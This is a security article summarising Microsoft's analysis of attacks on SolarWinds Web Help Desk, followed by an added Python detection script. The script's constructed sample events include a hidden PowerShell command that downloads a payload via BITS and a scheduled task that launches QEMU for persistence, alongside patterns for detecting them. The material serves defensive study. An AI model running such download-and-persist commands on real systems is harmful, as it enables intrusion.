www.microsoft.com 2/7/2026, 2:55:33 AM

Analysis of active exploitation of SolarWinds Web Help Desk

The Microsoft Defender Security Research Team reports a multi-stage intrusion in which threat actors exploited internet-exposed SolarWinds Web Help Desk (WHD) instances to gain an initial foothold and then moved laterally toward high-value assets. The attacks occurred in December 2025 against hosts vulnerable to both the newer and the older WHD CVEs; the team has not yet confirmed which CVE was used for initial access, and cites CVE-2025-40551, CVE-2025-40536 and CVE-2025-26399 as candidates.

The researchers describe a pattern in which a single exposed application that is unpatched or poorly monitored can lead to full domain compromise. The observed activity relied on living-off-the-land techniques and low-noise persistence, including DLL sideloading via wab[.]exe (the Windows Address Book binary) and the use of legitimate tools.

Successful exploitation gave unauthenticated remote code execution on the WHD host, after which the attackers spawned PowerShell, used BITS to download payloads and, in some cases, installed Zoho ManageEngine components for interactive remote control. The report also details credential access and lateral movement through actions such as DCSync, persistence through reverse SSH tunnels and RDP, and a scheduled task that launched a QEMU virtual machine to hide activity while exposing SSH through port forwarding.

Mitigation guidance emphasises patching the WHD CVEs and restricting internet exposure of WHD, evicting unauthorized RMM artefacts, rotating credentials, and increasing logging and monitoring across the identity, endpoint and network layers. Microsoft provides Defender XDR detections and hunting queries for both pre-breach and post-breach coverage.
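As an added example (not code from the Microsoft report, SolarWinds, or the Defender hunting queries it mentions), the following Python rule pass shows what detection logic for the chain summarised above looks like when run over process-creation telemetry: the WHD Java/Tomcat process spawning a shell, a BITS download, wab.exe executing from an unexpected path, and a scheduled task that launches QEMU, then correlated per host so a foothold followed by a later stage stands out. The WHD install directory, image names, rule names and all sample events are assumptions; the events are constructed, not captured telemetry.

```python
"""Added example: rule pass over constructed process-creation events modelled on
the WHD intrusion chain. Paths, rule names and events are assumptions."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class ProcEvent:
    ts: str            # ISO 8601 timestamp
    host: str
    parent_image: str  # full path of the parent process
    image: str         # full path of the newly created process
    cmdline: str


@dataclass
class Finding:
    rule: str
    host: str
    ts: str
    detail: str


# Assumed default WHD install directory on Windows; adjust to your deployment.
WHD_DIR_MARKER = "\\webhelpdesk\\"
JAVA_IMAGES = {"java.exe", "javaw.exe", "tomcat9.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
# Only the signed copy shipped with Windows Mail is expected. wab.exe anywhere
# else, next to an attacker-supplied DLL, is the sideloading pattern.
WAB_EXPECTED = {
    r"c:\program files\windows mail\wab.exe",
    r"c:\program files (x86)\windows mail\wab.exe",
}


def _name(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def detect(events):
    """Return one Finding per (event, rule) match; an event can match several."""
    out = []
    for e in events:
        parent, image, cmd = _name(e.parent_image), _name(e.image), e.cmdline.lower()
        # Stage 1: post-RCE behaviour, WHD's Java/Tomcat process starting a shell.
        if (parent in JAVA_IMAGES and WHD_DIR_MARKER in e.parent_image.lower()
                and image in SHELLS):
            out.append(Finding("whd_spawns_shell", e.host, e.ts, f"{parent} -> {image}"))
        # Stage 2: payload download via BITS (bitsadmin or the PowerShell cmdlet).
        if (image == "bitsadmin.exe" and "/transfer" in cmd) or \
           (image in SHELLS and "start-bitstransfer" in cmd):
            out.append(Finding("bits_download", e.host, e.ts, e.cmdline))
        # Persistence/evasion: wab.exe launched from outside its shipped location.
        if image == "wab.exe" and e.image.lower() not in WAB_EXPECTED:
            out.append(Finding("wab_unexpected_path", e.host, e.ts, e.image))
        # Persistence: scheduled task whose action starts a QEMU guest.
        if image == "schtasks.exe" and "/create" in cmd and "qemu" in cmd:
            out.append(Finding("qemu_scheduled_task", e.host, e.ts, e.cmdline))
    return out


def hosts_with_chain(findings):
    """Hosts where the WHD foothold was followed by at least one later stage."""
    rules_by_host = defaultdict(set)
    for f in findings:
        rules_by_host[f.host].add(f.rule)
    return sorted(h for h, rules in rules_by_host.items()
                  if "whd_spawns_shell" in rules and len(rules) > 1)


# Constructed sample telemetry (not from any real incident). 198.51.100.0/24 is a
# documentation range.
SAMPLE_EVENTS = [
    ProcEvent("2025-12-03T01:12:04Z", "whd01",
              r"C:\Program Files\WebHelpDesk\bin\jre\bin\java.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'powershell.exe -nop -w hidden -c "Start-BitsTransfer -Source '
              r'http://198.51.100.7/u.bin -Destination C:\ProgramData\u.bin"'),
    ProcEvent("2025-12-03T01:14:30Z", "whd01",
              r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /tn "SystemHealth" /sc onstart '
              r'/tr "C:\ProgramData\q\qemu-system-x86_64.exe -nographic -hda C:\ProgramData\q\d.qcow2"'),
    ProcEvent("2025-12-03T01:15:02Z", "whd01",
              r"C:\Windows\System32\cmd.exe", r"C:\ProgramData\q\wab.exe", "wab.exe"),
    # Benign: a different Java application starting a shell is not the WHD rule.
    ProcEvent("2025-12-03T02:00:00Z", "build02",
              r"C:\Tools\jenkins\jre\bin\java.exe", r"C:\Windows\System32\cmd.exe",
              "cmd.exe /c gradlew build"),
    # Benign: the shipped wab.exe and an ordinary scheduled task.
    ProcEvent("2025-12-03T02:05:00Z", "ws07",
              r"C:\Windows\explorer.exe", r"C:\Program Files\Windows Mail\wab.exe", "wab.exe"),
    ProcEvent("2025-12-03T02:06:00Z", "ws07",
              r"C:\Windows\System32\cmd.exe", r"C:\Windows\System32\schtasks.exe",
              r'schtasks.exe /create /tn "Backup" /sc daily /tr "C:\Scripts\backup.bat"'),
]


if __name__ == "__main__":
    found = detect(SAMPLE_EVENTS)
    for f in found:
        print(f"{f.ts} {f.host} {f.rule}: {f.detail}")
    print("hosts with foothold plus follow-on stage:", hosts_with_chain(found))
```

DCSync is absent from the rules above because it is not visible in process creation: it surfaces on the domain controller as directory-service access audit events (Windows Event ID 4662) requesting the DS-Replication-Get-Changes rights from an account that is not a DC, which a production rule set would correlate with the endpoint findings for the same window.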

Article by CyberSIXT